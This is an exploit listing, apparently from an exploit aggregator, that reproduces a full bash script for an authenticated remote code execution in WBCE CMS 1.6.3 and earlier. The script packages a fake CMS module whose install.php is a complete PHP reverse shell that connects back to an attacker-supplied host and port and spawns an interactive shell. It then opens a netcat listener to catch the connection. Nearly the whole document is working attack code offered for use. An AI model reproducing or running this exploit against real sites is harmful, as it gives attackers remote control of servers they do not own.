Exploit for WBCE CMS 1.6.3 Remote Code Execution

Name: Exploit for WBCE CMS 1.6.3 Remote Code Execution
Rating: 5 (36 reviews)
2025-04-07 | CVSS 8.1
## https://sploitus.com/exploit?id=PACKETSTORM:190302
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
    # Date: 3/22/2025
    # Exploit Author: Swammers8
    # Vendor Homepage: https://wbce-cms.org/
    # Software Link: https://github.com/WBCE/WBCE_CMS
    # Version: 1.6.3 and prior
    # Tested on: Ubuntu 24.04.2 LTS
    # YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
    # Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
    
    #!/bin/bash
    
    # Make a zip file exploit
    # Start netcat listener
    
    if [[ $# -ne 2 ]]; then
    	echo "[*] Description:"
    	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
    	echo "[*] It will create an infected module .zip file and start a netcat listener."
    	echo "[*] Once the zip is created, you will have to login to the admin page"
    	echo "[*] to upload and install the module, which will immediately run the shell"
    	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
    	echo "[!] Usage:"
    	echo "[*] $0 <lhost> <lport>"
    	exit 1
    fi
    
    if [ -z "$(which nc)" ]; then
    	echo "[!] Netcat is not installed."
    	exit 1 
    fi
    
    ip=$1
    port=$2
    
    rm -rf shellModule.zip
    rm -rf shellModule
    mkdir shellModule
    
    echo [*] Crafting Payload
    
    cat <<EOF > shellModule/info.php
    <?php
    /**
     *
     * @category        modules
     * @package         Reverse Shell
     * @author          Swammers8
     * @link                        https://swammers8.github.io/
     * @license         http://www.gnu.org/licenses/gpl.html
     * @platform        example.com
     * @requirements    PHP 5.6 and higher
     * @version         1.3.3.7
     * @lastmodified    May 22 2025
     *
     *
     */
    
    \$module_directory               = 'modshell';
    \$module_name                    = 'Reverse Shell';
    \$module_function                = 'page';
    \$module_version                 = '1.3.3.7';
    \$module_platform                = '2.10.x';
    
    \$module_author                  = 'Swammers8';
    \$module_license                 = 'GNU General Public License';
    \$module_description     = 'This module is a backdoor';
    
    ?>
    EOF
    
    cat <<EOF > shellModule/install.php
    <?php
    set_time_limit (0);
    \$VERSION = "1.0";
    \$ip = '$ip';  // CHANGE THIS
    \$port = $port;       // CHANGE THIS
    \$chunk_size = 1400;
    \$write_a = null;
    \$error_a = null;
    \$shell = 'uname -a; w; id; /bin/sh -i';
    \$daemon = 0;
    \$debug = 0;
    
    if (function_exists('pcntl_fork')) {
    	\$pid = pcntl_fork();
    	if (\$pid == -1) {
    		printit("ERROR: Can't fork");
    		exit(1);
    	}
    	
    	if (\$pid) {
    		exit(0);  // Parent exits
    	}
    
    	if (posix_setsid() == -1) {
    		printit("Error: Can't setsid()");
    		exit(1);
    	}
    
    	\$daemon = 1;
    } else {
    	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    
    chdir("/");
    
    umask(0);
    
    
    \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
    if (!\$sock) {
    	printit("\$errstr (\$errno)");
    	exit(1);
    }
    
    \$descriptorspec = array(
       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
       2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );
    
    \$process = proc_open(\$shell, \$descriptorspec, \$pipes);
    
    if (!is_resource(\$process)) {
    	printit("ERROR: Can't spawn shell");
    	exit(1);
    }
    
    stream_set_blocking(\$pipes[0], 0);
    stream_set_blocking(\$pipes[1], 0);
    stream_set_blocking(\$pipes[2], 0);
    stream_set_blocking(\$sock, 0);
    
    printit("Successfully opened reverse shell to \$ip:\$port");
    
    while (1) {
    	if (feof(\$sock)) {
    		printit("ERROR: Shell connection terminated");
    		break;
    	}
    
    	if (feof(\$pipes[1])) {
    		printit("ERROR: Shell process terminated");
    		break;
    	}
    
    	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
    
    	if (in_array(\$sock, \$read_a)) {
    		if (\$debug) printit("SOCK READ");
    		\$input = fread(\$sock, \$chunk_size);
    		if (\$debug) printit("SOCK: \$input");
    		fwrite(\$pipes[0], \$input);
    	}
    
    	if (in_array(\$pipes[1], \$read_a)) {
    		if (\$debug) printit("STDOUT READ");
    		\$input = fread(\$pipes[1], \$chunk_size);
    		if (\$debug) printit("STDOUT: \$input");
    		fwrite(\$sock, \$input);
    	}
    
    	if (in_array(\$pipes[2], \$read_a)) {
    		if (\$debug) printit("STDERR READ");
    		\$input = fread(\$pipes[2], \$chunk_size);
    		if (\$debug) printit("STDERR: \$input");
    		fwrite(\$sock, \$input);
    	}
    }
    
    fclose(\$sock);
    fclose(\$pipes[0]);
    fclose(\$pipes[1]);
    fclose(\$pipes[2]);
    proc_close(\$process);
    
    function printit (\$string) {
    	if (!\$daemon) {
    		print "\$string\n";
    	}
    }
    
    ?> 
    EOF
    
    echo [*] Zipping to shellModule.zip
    zip -r shellModule.zip shellModule
    rm -rf shellModule
    echo [*] Please login to the WBCE admin panel to upload and install the module
    echo [*] Starting listener
    
    nc -lvnp $port
    
    echo
    echo
    echo "[*] Done!"
    echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"